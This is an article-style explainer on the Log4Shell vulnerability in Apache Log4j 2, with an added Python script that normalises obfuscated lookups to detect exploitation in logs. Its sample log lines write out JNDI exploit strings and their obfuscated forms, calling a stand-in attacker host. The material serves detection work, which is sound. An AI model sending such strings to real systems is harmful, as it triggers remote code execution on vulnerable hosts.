The Log4Shell Vulnerability Will Haunt the Internet for Years

    A vulnerability in the open-source Apache logging library Log4j, known as Log4Shell, sent system administrators and security professionals scrambling over the weekend. The flaw exposes some of the world's most popular applications and services. 

    “What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Valentin. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.” 

    Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), the Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. 

    An attacker sends an HTTP request to a target system. The application logs a string from that request using Log4j 2, and Log4j's JNDI lookup makes the logging process connect to an attacker-controlled server. The exploited process then retrieves and executes the payload that server returns. In many observed attacks the attacker-controlled address is a DNS logging service, used only to record which systems make the callback and so fingerprint vulnerable hosts. 

    The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. 

    As security teams work to detect exploitation of the vulnerability, attackers have added obfuscation to these requests to evade detections based on request patterns. We’ve seen things like the ${lower:...} and ${upper:...} lookups nested inside the exploitation string, and even more complicated obfuscation attempts, all trying to bypass string-matching detections. 
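The callback mechanism and the obfuscation just described can be checked against log data with a small normaliser. The block below is an added example, not code from the original post or from any Microsoft detection: it resolves the innermost Log4j lookups the way Log4j's StrSubstitutor does (innermost first, ${lower:}/${upper:} applied, an unresolvable variable replaced by its `:-` default) and only then looks for a JNDI lookup and the scheme it would dial out on. The log lines, the `attacker.example` hosts and the `ua=` field layout are all constructed for the example; a naive substring match is included beside it so the miss on obfuscated strings is visible.

```python
import re

# Constructed sample log lines (not from any real incident). Each ends with
# the logged User-Agent, the most common injection point seen in the wild.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 ua="${${lower:j}${upper:n}di:${lower:ldap}://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 ua="${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 ua="${${env:NOTSET:-j}ndi:dns://attacker.example/${hostName}}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0 (compatible; legit-bot/1.0)"',
    '10.0.0.10 - - "GET /${date:yyyy} HTTP/1.1" 200 ua="curl/7.88"',
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNER = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup after normalisation; Log4j lower-cases the prefix, so match
# case-insensitively and capture the URL scheme (ldap, rmi, dns, ...).
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)', re.IGNORECASE)


def _resolve_one(content: str):
    """Resolve one innermost lookup body the way Log4j would.

    Returns the replacement text, or None when the lookup should be left in
    place (a jndi: lookup, or a variable we cannot and should not evaluate).
    """
    body, has_default, default = content.partition(':-')
    prefix, sep, arg = body.partition(':')
    if sep and prefix.lower() == 'lower':
        return arg.lower()
    if sep and prefix.lower() == 'upper':
        return arg.upper()
    if has_default:
        # "${::-j}" and "${env:NOTSET:-j}": the variable does not resolve,
        # so Log4j substitutes the default text after ":-".
        return default
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(match):
            nonlocal changed
            resolved = _resolve_one(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


def naive_match(line: str) -> bool:
    """The string-matching rule the obfuscation is designed to defeat."""
    return '${jndi:' in line.lower()


def scan_line(line: str) -> dict:
    """Normalise a log line and report whether it carries a JNDI lookup."""
    normalized = normalize(line)
    match = JNDI.search(normalized)
    return {
        'raw': line,
        'normalized': normalized,
        'obfuscated': normalized != line,
        'jndi': match is not None,
        'scheme': match.group(1).lower() if match else None,
    }


def scan(lines):
    """Return the findings for every line that resolves to a JNDI lookup."""
    return [r for r in (scan_line(line) for line in lines) if r['jndi']]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG_LINES):
        print(finding['scheme'], finding['obfuscated'], finding['normalized'])
```

Running it flags the first four constructed lines (ldap, ldap, rmi, dns), three of which the naive substring rule misses, and leaves the benign ${date:yyyy} lookup on the last line alone because it never resolves to a jndi: prefix. The normaliser deliberately does not evaluate ${env:}, ${sys:} or ${hostName} to real values; it only needs the structure to collapse far enough to expose the lookup the attacker is trying to hide.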

    The security team is setting up a dedicated website to provide information and counter “active disinformation,” said Monish, executive assistant director for cybersecurity on the team. The vulnerability would “allow remote attackers to easily take control of the system in which they exploit it,” he said. 

    It’s going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, Monish said. 

    Attackers will keep looking for creative new ways to discover and exploit as many vulnerable systems as possible. The scariest part of Log4Shell, though, is how many organizations won't even realize that they have systems at risk. 
